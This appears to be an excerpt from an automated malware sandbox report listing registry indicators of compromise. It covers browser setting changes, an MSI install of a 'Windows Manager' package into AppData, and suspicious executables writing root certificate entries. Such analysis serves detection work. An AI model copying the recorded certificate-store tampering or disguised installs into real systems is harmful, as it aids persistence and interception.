\REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000b7b97bafaf12a814644fbc0a36a8a883c300644180615de4bb42f2a3aa38b378000000000e8000000002000020000000fa747aca114ff0a06827ae6352122f1dfbf71942d7051b20b4e1b3ed7f77dcb09000000024a72966153aeede18a7c00d1be336173156f32ee91a0b9108a8bca5d97fc4a911090cee241516605509f30e3355cb8958233ffafa72c234fb31c6538b520ced4fe97648abb6a0ce9145d4925ce745b22cfb20c723bb73a61255331059c612152def1e676becf19f20ab2759c202bc3aa6993f079cfbf55504f2fce86bcaded05a60304288250ab7733359599de03b4c4000000051a5c3440e8440e92822fb6609ae7504ecb41df5770a71ef42911a840f1b66288e2eb466eadb5f7a00c991dc3cfe5a3351dcbe74d061e104517b4c8d28d7a262 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca000000000200000000001066000000010000200000009d3681a36b624ecd17140cdbbcb5be7d21eb266b4c68c57d68e58e37e4afed41000000000e8000000002000020000000dcf69982cbee2b98c3fab434fb8c0ff34fe03a05320d0859c9d5786b39a33acff0040000aba0d8a5e2573e7163650b8f5e4fdfeaa9dc42f60e736d55a8424b6fe4340578930f15f2754d5218ec12435c39614957bdb22a65162c51666554094e8206beda4f0855cb88c791e00e843bf1adaf92c4a33b5a8aa210aff6661a6eb2fe8a4d3f36f0fa35e66e716d593ff93dec2395cf2ff347ce3fa3a3d2c92323b42cf25d38e95a0594f8d51a5229b0e9a99e6ac564f7450616e6d9545fe2090fb5955ea71a5353faf2f89ba3086ddb67eae6d831237b7212dbe1148cd871c3df2faa52b851774e2096d577cd3a706ca3c46e84abdce97e1a799e781ed6051fffb5226297690deeac4272a40d53a92aa5f66f982cfdb02aeb24cb96c116685d4d924881861df732d34b87534a13844557b513b1a89ef0dece096f71bed2ea3284ca0ff5550031dc10f84ce086a3b9ee5d4a580e8748a59df709d434956809c189d45216db4e442e676f98faf2227038cc6eab0979ccbca382cf13d6ebe26d8804e8863ef0525736ca5e988cdb9cc6ea1578320b4f3c3e698aa3af38cec6075c6181d66ce876320374f5f4ebc67a06bd4793ceccbbe4895b04cb09d5851b404f810ebe20dafb1e2169273ad5c7ce0dba4497ad053a405c5ef3ca1b46f5db003c5ef469bf0659ab94afc342ba9325dbf7c27ac23d6b87f3539175eed3c8355c764e71bb547fc92e43c2b0c56bd27a6345608e942f1039875cc7b20b75f1c76f1232a0e6fb9368e0e431eb3d2a6d6d910779b680e55462692be1d2774ea4ddfda4a0a4017adc7ab7e37c271ca6dbd0ddeb3aaa912b13d2a0089321080ed8583ac64bf00835f5e9b4a9227751db67d64c3555507e194385549df91fc1e6b4c5f61521e40385209fa815c47b887debffd578635f1d724c47b01499c500d5865370297436003a53d2c160cbe7117ab14048633e67123327477c403962ffa6e3340c5e29ec81dee20bd74afa3c22de8f293573ab652541e2ec94a90340b911409aebde5f43bdbeae5fb2dc7ff1cb09f641a242628f80009d8be4683ca9d9e0bfec0f6a210dae409df71ca799d8dd834cea4d6a1bd46617a12fbb5a5bc2e711bba9aa3f452f9da7309b2076c75e7434ec164d657563629e8fa46e1157a387eaa77f5ed6527e9508b003c328134e6f86f3a24776c41fefe4051d0783600c9a7f23a5b233251f97311672e00323370ed18998636e5ba9fe32353d88a19cae9a608fee9a4516030222b68c3eb2d6999c2154bc7ee00c1e52e8aaee7900c44e7e1af3634549624482bc1fa05b9b9e481ef28dcccb01ebdf4d7121bb4274c669992b607612d67c997680e49dd34a4b39c23c63e8f94142c4a46978826c55568e7a69702a65ac6c2c92a390846ff9d87f5f2589f0a07bc1b140c0d28369a15ba22240221bc7671c3a78be93d1090fb2a69cb6974d4d058000e3a17f463e3b15d999a5bbd7d26f614f7f24d8f85202e69c5204420e82e3be1c2769527dd73f71016c57303e976645f079b10682a9e2f76583934d39d662182fc4f01e00097b72105e011b6b02be355ba3d069e0afdacd6e314c8db25a8649c3d22c42e96c1d32da880bf5a2faf2d05c90ffb497e59e737ba8a6ec0eb25e627854c4d26a75fb622a826be87365dfe58b446db164de8362fbca292590937ebcb17e73c4b450f630ac3eeb7284f7db5ab908a11fe23edbc171aa8cb91f8d0294e2164afc9f03ca723538aba9487ef45561e49aa9267eafcee3708408dcfc6f3e52f5aed37d4094c2a510df4c9fda3f85370fc60a331645cddcf7926ff968672470dccfd35840000000ff97314e4587d5a4f8f7f51aff5b1ae3e36487c91d376527a1c2a9d4c7f1c45957446bb04e19c63595f241525abd25315e40de0161682a95ac7d6ff68df5c406 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca000000000200000000001066000000010000200000006d36882dd280068e164d92db32dd17a3509bc02b5b3c50f71d6267bb18af16c7000000000e80000000020000200000003c2b8713e79d726d6320a21c6f7332dec36c6cc961e074af8657f7af94ebd5272000000016662fd3f087f26db797847107eaf6772f860f0ad5ee2da030ea584e7674dcb740000000581a6a632d571adb3fb28150c3e9a7686a9e09ecae6c694031e4c6062a7955c4302123f8b91562801270d795fda6d4aa967dfca6755e58013c577ec4fda2d40a iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{68F96110-1340-11EC-A404-D2CAC2128933} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000da9917b553f3f29502585c9478028b1b3e1e809e925379e52c0701dbca257635000000000e80000000020000200000005f0a080ad9e05cb875549e492de6da8dad51321554d3bb0578a63560e826e260f00400001c2ef996ea0b06b54230735145fea29b98a1afaa015b1d62fc47f15498dd77d18488249c0f31bfb6683fd150d3aadb69dfb0a2c643efd8eaf94906a53edde2d4e589bf263bbbb790a2e742261dd75e95b4816089be6b09c9332439f4b72262f8408bb3e2941d52b75b18f92f49d00a6bfc1cd0cbba9ba4a208f5eaa1372dbe601b5b185dfa8a94547f954cfa72637cfe3e23521fb7c01a061ef58491c9d693d752f54acd5998b3afa464881d56893f3c0d2aec2d6b8d3b2ce3b846f6a8e0049c6d854c0636f55bb3f5170f741a9af939903bc7feff708878a1b1cd82061698da668ddb3731b916bce1f649a9baf3d09919f723d18480b658ec4e622166a3983698ce82d332b579787e92a186ea8aa878b817942e37995993769f7c144a716a3410fafd10c7180486a2ed1479e0626ed721efaa5be38653041f582507a95da01209147ecdea8c21fb68a933046e6ccdd1e4c4752587b8678ac79197f580dcde50600f4d19e55b4ad6abbd65c1a6345be16021884d27bfce0746e2d1586e27ffd1081a4c2be63708ed993900d5334a917584abf71b31559d8fde074fadf90f667310fed3819fd6e1e16758e08e36fab324dbb2cd3b6347b8d4a96c301f9fe88af661a93c0c42c17c5bac80fc3243051512664206e4c48c9d66e73c74e8a800acbdba4e7e19c879d78b0983839d83460a3a5191cc4f3bdb136dc6ca074c64696ce011d1fe146eebfe69f4b3691d0e815570ab2bd202aea6d99ea1a5ec2f5299aa3113640996293ee047b4092338ad240bcdac6334f16ad925a10dcba5ec6274fdc120f3526ebbe10b788831606f0a55e3718f8d97958cdc413b57f161b504c84fc42fa9d4f03e9954e849f086c5a754a5c3ca3e36bc5c3db6aec9f3bafe9e06f0e06ba928ab5808bfa9a24c069323283d1b3ffbcb750b76e1e5d9a90248f3a42f3def87f93664fb5929f9a87e538e997de33984b2c2f7aa9e57931c010e6fbdab5303a3380d8fd3989307b2a32339e8b9ab638a3a1d62c0b5b7ad310cca1d51ad0b013f05ccb0b3f59209387bbcd4398c08e2aa126729cc6b79c4b85d88a503817a3177003eb3363310aa40b7bc2c8c03ebd8fa19967ededa0827fb19b1ddf6eb916ead573000ffb5f8a8fdbaef81cbd8d5367a8d8d5fb00c20e385bf8e798116e92a0d7ec9f4afc06633a73dee1334e0b584069ddea784a1968509f0026d0447a8fc60f0308bac344b54e2c3b3f97f2edf80cf9b654dc70e7ba9347c2dc31b9d7b3e2b8b1ee5f5848e2aac240cc7d02378c5b09cc1892919c83d310b590c3b17f17716f80cb99a26589bc7efc71f0f31461666f0c15376e6e6446ca2b75cc324f5097cd0d06cdcad1761df0c51e83ce27344d8091733183a92523bfbf712282f31df030eced4ba6e5dc5db9d9f35848dd90c656c928174ee2ddcc1fb6924ba4d5925d2e427046a9588ddceefc5c4d752d25ba08b00130ca588908c314fefcf32d4ba4b8d74c694e142e5c7bc34c6f42f664edf036b95df5f633ce25eab179737e69f4197ff73cbec54536ffcc9fc7e058ca6f623276a4d0dd0e91edca9aa91e885e91f68d20cf760484f9a7d64d43faa20ee001a1b42d33435078be01a5a4f3e19f98ff6f5a0d7f927a2adba9c58ce1667f1700b311bf1b39200ccfb0a53633cf06373ab4b1e1bdc4c31cdeb4f606728e45b8ac79fe001a4bacf7b6e474b58ebcc9abd1a9f7a3a38d0158ee8ab23415ef52371f39533469be680a4d2609b75b920d772d22e4d6cd31868d936cc023c84c640000000473abe70ca3fad744f7f35760fed967553b6a66c7d8b6fd0f62d796a6b80d337264fc39201da8c8f4ee68a02764f43a681f94710569019b2f85fc1d740c20bcd iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
msiexec.exedescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26 msiexec.exe -
Modifies registry class 24 IoCs
Processes:
msiexec.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net msiexec.exe -
Processes:
Sat19e6a852f849bb2.exeanyname.exeinstaller.exeSat196ac06a9e6.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sat19e6a852f849bb2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 anyname.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 anyname.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b